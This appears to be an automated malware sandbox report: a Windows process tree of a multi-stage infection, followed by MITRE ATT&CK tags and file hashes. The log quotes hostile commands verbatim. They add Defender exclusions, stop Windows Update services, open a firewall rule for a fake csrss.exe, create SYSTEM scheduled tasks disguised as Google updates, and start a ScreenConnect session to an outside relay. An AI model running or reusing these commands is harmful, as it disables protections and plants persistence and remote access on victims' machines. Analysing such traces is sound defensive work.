C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7fffc61046f8,0x7fffc6104708,0x7fffc61047186⤵PID:5004
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1852,8564015686658397417,9649451002030360748,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2120 /prefetch:36⤵PID:4296
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1852,8564015686658397417,9649451002030360748,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2068 /prefetch:26⤵PID:1636
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/5⤵PID:2596
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7fffc61046f8,0x7fffc6104708,0x7fffc61047186⤵PID:2996
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,5957412549846283750,7165242936021682091,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2168 /prefetch:26⤵PID:212
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2156,5957412549846283750,7165242936021682091,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 /prefetch:36⤵PID:4852
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\B07.exeC:\Users\Admin\AppData\Local\Temp\B07.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
PID:5504 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Co9bS0tM.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Co9bS0tM.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4964 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\fi0TE8LZ.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\fi0TE8LZ.exe4⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4116 -
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\yw4Qa1zI.exeC:\Users\Admin\AppData\Local\Temp\IXP003.TMP\yw4Qa1zI.exe5⤵
- Executes dropped EXE
- Adds Run key to start application
PID:2512 -
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\LA5JJ4ee.exeC:\Users\Admin\AppData\Local\Temp\IXP004.TMP\LA5JJ4ee.exe6⤵
- Executes dropped EXE
- Adds Run key to start application
PID:5860 -
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1fS14XO6.exeC:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1fS14XO6.exe7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5912 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"8⤵PID:1236
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1236 -s 5409⤵
- Program crash
PID:916
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Eg054Ci.exeC:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Eg054Ci.exe7⤵
- Executes dropped EXE
PID:5676
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\C70.exeC:\Users\Admin\AppData\Local\Temp\C70.exe2⤵
- Executes dropped EXE
PID:2464
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\E16.bat" "2⤵PID:1636
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login3⤵PID:5576
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffc61046f8,0x7fffc6104708,0x7fffc61047184⤵PID:5600
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/3⤵PID:224
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffc61046f8,0x7fffc6104708,0x7fffc61047184⤵PID:5128
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\F31.exeC:\Users\Admin\AppData\Local\Temp\F31.exe2⤵
- Executes dropped EXE
PID:5724
-
-
C:\Users\Admin\AppData\Local\Temp\11D2.exeC:\Users\Admin\AppData\Local\Temp\11D2.exe2⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
- Suspicious use of AdjustPrivilegeToken
PID:5968
-
-
C:\Users\Admin\AppData\Local\Temp\1482.exeC:\Users\Admin\AppData\Local\Temp\1482.exe2⤵
- Executes dropped EXE
PID:4760
-
-
C:\Users\Admin\AppData\Local\Temp\17BF.exeC:\Users\Admin\AppData\Local\Temp\17BF.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2232
-
-
C:\Users\Admin\AppData\Local\Temp\4180.exeC:\Users\Admin\AppData\Local\Temp\4180.exe2⤵
- Checks computer location settings
- Executes dropped EXE
PID:1048 -
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2496 -
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:1240
-
-
-
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"3⤵
- Executes dropped EXE
PID:5972 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵PID:3032
-
-
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"4⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:4332 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Modifies data under HKEY_USERS
PID:6076
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵PID:760
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
PID:880
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:6056
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:5448
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe5⤵PID:5404
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵PID:2644
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- DcRat
- Creates scheduled task(s)
PID:5832
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f6⤵PID:5836
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵PID:5288
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵PID:1660
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll6⤵PID:1912
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- DcRat
- Creates scheduled task(s)
PID:4344
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"6⤵PID:5048
-
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)7⤵PID:208
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)8⤵
- Launches sc.exe
PID:4056
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\kos2.exe"C:\Users\Admin\AppData\Local\Temp\kos2.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
PID:1592 -
C:\Users\Admin\AppData\Local\Temp\set16.exe"C:\Users\Admin\AppData\Local\Temp\set16.exe"4⤵
- Executes dropped EXE
PID:3872 -
C:\Users\Admin\AppData\Local\Temp\is-JRNAN.tmp\is-SCTOF.tmp"C:\Users\Admin\AppData\Local\Temp\is-JRNAN.tmp\is-SCTOF.tmp" /SL4 $B020C "C:\Users\Admin\AppData\Local\Temp\set16.exe" 1281875 522245⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
PID:6032 -
C:\Program Files (x86)\MyBurn\MyBurn.exe"C:\Program Files (x86)\MyBurn\MyBurn.exe" -i6⤵
- Executes dropped EXE
PID:5164
-
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" helpmsg 206⤵PID:1208
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 helpmsg 207⤵PID:2328
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /Query6⤵PID:2116
-
-
C:\Program Files (x86)\MyBurn\MyBurn.exe"C:\Program Files (x86)\MyBurn\MyBurn.exe" -s6⤵
- Executes dropped EXE
PID:2856
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\K.exe"C:\Users\Admin\AppData\Local\Temp\K.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6084
-
-
-
C:\Users\Admin\AppData\Local\Temp\latestX.exe"C:\Users\Admin\AppData\Local\Temp\latestX.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
PID:5348
-
-
-
C:\Users\Admin\AppData\Local\Temp\4394.exeC:\Users\Admin\AppData\Local\Temp\4394.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4160
-
-
C:\Users\Admin\AppData\Local\Temp\46C1.exeC:\Users\Admin\AppData\Local\Temp\46C1.exe2⤵
- Executes dropped EXE
PID:5664
-
-
C:\Users\Admin\AppData\Local\Temp\4C7F.exeC:\Users\Admin\AppData\Local\Temp\4C7F.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
PID:5396 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5396 -s 7843⤵
- Program crash
PID:1172
-
-
-
C:\Users\Admin\AppData\Local\Temp\5663.exeC:\Users\Admin\AppData\Local\Temp\5663.exe2⤵
- Executes dropped EXE
PID:5232 -
C:\Windows\system32\rundll32.exeC:\Windows\system32\rundll32.exe edebdfcedd.sys,#13⤵PID:4108
-
-
-
C:\Users\Admin\AppData\Local\Temp\5A2D.exeC:\Users\Admin\AppData\Local\Temp\5A2D.exe2⤵
- Executes dropped EXE
PID:3372
-
-
C:\Users\Admin\AppData\Local\Temp\6D2A.exeC:\Users\Admin\AppData\Local\Temp\6D2A.exe2⤵
- Checks computer location settings
- Executes dropped EXE
PID:1636 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\7af762b74adeaec9\setup.msi"3⤵
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
PID:4832
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵PID:1388
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵PID:5140
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:5764
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:5812
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:4940
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:5136
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:5928
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:5912
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵PID:4344
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵PID:5472
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵PID:5088
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵PID:2144
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵PID:3344
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵PID:3784
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵PID:4120
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2144
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵PID:5464
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:1388
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:5912
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:5500
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:2644
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:3792
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:4072
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵PID:5620
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵PID:2568
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵PID:5564
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵PID:1484
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵PID:3876
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵PID:5188
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵PID:4832
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2484
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5176
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 1236 -ip 12361⤵PID:5836
-
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exeC:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe1⤵
- Executes dropped EXE
PID:5160
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5396 -ip 53961⤵PID:5732
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe edebdfcedd.sys,#11⤵
- Loads dropped DLL
PID:1500
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
PID:6024 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 5A17E0E73780CE5645A25479B36655AE C2⤵
- Loads dropped DLL
PID:1044 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSI7E14.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240680593 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments3⤵
- Loads dropped DLL
PID:5384
-
-
-
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:22⤵PID:4836
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 14138B834C9F25761AB7C11AE5CBC8822⤵
- Loads dropped DLL
PID:860
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding E90657D5C3E0F730E3B9E982CEDCF89B E Global\MSI00002⤵PID:4620
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Checks SCSI registry key(s)
PID:5296
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"1⤵PID:972
-
C:\Program Files (x86)\ScreenConnect Client (7af762b74adeaec9)\ScreenConnect.ClientService.exe"C:\Program Files (x86)\ScreenConnect Client (7af762b74adeaec9)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=instance-wjv7ml-relay.screenconnect.com&p=443&s=76d8eb08-eecf-4df4-b9fc-b13fa03b3ee5&k=BgIAAACkAABSU0ExAAgAAAEAAQBVtkAS74ndeC6RS9Y5ZcwQzUh6ZAKEd0U3DB2SEJoCIMl3KfET0lBrZrygWuo6V3jSbEvS0AIJiFbP1iu5PJKfrhyIDzsG%2fPV9voTxMOztxG1v5DrYw%2fMXnwIhhwARp1qKHotKCTMkjmq2leAlfCbawydUfWTMW9uLL6Cb2n1l4vxhFVUvwhIPpb%2bL38j7V%2f0eBMEdtPo2vlZCHcu2Se0fgbPwxfxG2AMvh3Po0RdRJUFvEvAnZHipk5XOCg9ZeZiXcXxct%2bOraL3Zf5eEXJ6w5Y1L5As%2f00QD3oSjDtRkOs2K%2b4yz1CNCNxU3Kuss59imtF3KlGBmF%2bF7NlJLb%2b66"1⤵PID:5568
-
C:\Program Files (x86)\ScreenConnect Client (7af762b74adeaec9)\ScreenConnect.WindowsClient.exe"C:\Program Files (x86)\ScreenConnect Client (7af762b74adeaec9)\ScreenConnect.WindowsClient.exe" "RunRole" "0e4196a1-d7bb-4511-acad-6b0ff5f52780" "User"2⤵PID:2492
-
-
C:\Program Files (x86)\ScreenConnect Client (7af762b74adeaec9)\ScreenConnect.WindowsClient.exe"C:\Program Files (x86)\ScreenConnect Client (7af762b74adeaec9)\ScreenConnect.WindowsClient.exe" "RunRole" "7d5fb7a1-77d6-4458-96cf-04e9ba3b9010" "System"2⤵PID:452
-
-
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exeC:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe1⤵PID:4792
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵PID:2436
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
3Windows Service
3Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
3Windows Service
3Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
213KB
MD51223664bd89d0154e686a45c46c4fb85
SHA14b6cf1b68a3573192a87856a2e1af5b11a29a3a1
SHA256dfb38a5f67856c1c094c6d24b96236c4d3e9f35c5d6bad596fe38674a060eae7
SHA5123700ada1d801ca21e33b5cad164e69aa39d90efa75542a263a5e96b0e8c12b85687e2659e374901b1ca86b54090a139f3cf9da4b441bb697e2efc5f1008c81e4
-
Filesize
152B
MD50629525c94f6548880f5f3a67846755e
SHA140ef667fc04bb1c0ae4bf2c17ded88594f0f4423
SHA256812576f4a24f399abbd54b83ba7f404f021d4a7d2ec0fd2f988ebf4cbf8477ee
SHA512f74d2e4a65a152f46852eb78dd70a958fdfb8c14e060ca41ffa783b7362e44659cc5fc73f59f3edb1f1d817000b85de7c1860512aa65d937eb5a0a8d9e5890fa
-
Filesize
152B
MD50629525c94f6548880f5f3a67846755e
SHA140ef667fc04bb1c0ae4bf2c17ded88594f0f4423
SHA256812576f4a24f399abbd54b83ba7f404f021d4a7d2ec0fd2f988ebf4cbf8477ee
SHA512f74d2e4a65a152f46852eb78dd70a958fdfb8c14e060ca41ffa783b7362e44659cc5fc73f59f3edb1f1d817000b85de7c1860512aa65d937eb5a0a8d9e5890fa
-
Filesize
152B
MD50629525c94f6548880f5f3a67846755e
SHA140ef667fc04bb1c0ae4bf2c17ded88594f0f4423
SHA256812576f4a24f399abbd54b83ba7f404f021d4a7d2ec0fd2f988ebf4cbf8477ee
SHA512f74d2e4a65a152f46852eb78dd70a958fdfb8c14e060ca41ffa783b7362e44659cc5fc73f59f3edb1f1d817000b85de7c1860512aa65d937eb5a0a8d9e5890fa
-
Filesize
152B
MD50629525c94f6548880f5f3a67846755e
SHA140ef667fc04bb1c0ae4bf2c17ded88594f0f4423
SHA256812576f4a24f399abbd54b83ba7f404f021d4a7d2ec0fd2f988ebf4cbf8477ee
SHA512f74d2e4a65a152f46852eb78dd70a958fdfb8c14e060ca41ffa783b7362e44659cc5fc73f59f3edb1f1d817000b85de7c1860512aa65d937eb5a0a8d9e5890fa
-
Filesize
152B
MD516e56f576d6ace85337e8c07ec00c0bf
SHA15c9579bb4975c93a69d1336eed5f05013dc35b9c
SHA2567796a7ba79148fc3cb46e4bbca48094376371ca9dd66f0810f7797c5e24158f5
SHA51269e89f39fa6438a74a48985387cd2e3e003858b0855ee6cd03abf6967674503b98b90573c784b4cf785b9cca594d3c8762f92def24e2bf51374ef5a00921e5e2
-
Filesize
152B
MD516e56f576d6ace85337e8c07ec00c0bf
SHA15c9579bb4975c93a69d1336eed5f05013dc35b9c
SHA2567796a7ba79148fc3cb46e4bbca48094376371ca9dd66f0810f7797c5e24158f5
SHA51269e89f39fa6438a74a48985387cd2e3e003858b0855ee6cd03abf6967674503b98b90573c784b4cf785b9cca594d3c8762f92def24e2bf51374ef5a00921e5e2
-
Filesize
152B
MD50629525c94f6548880f5f3a67846755e
SHA140ef667fc04bb1c0ae4bf2c17ded88594f0f4423
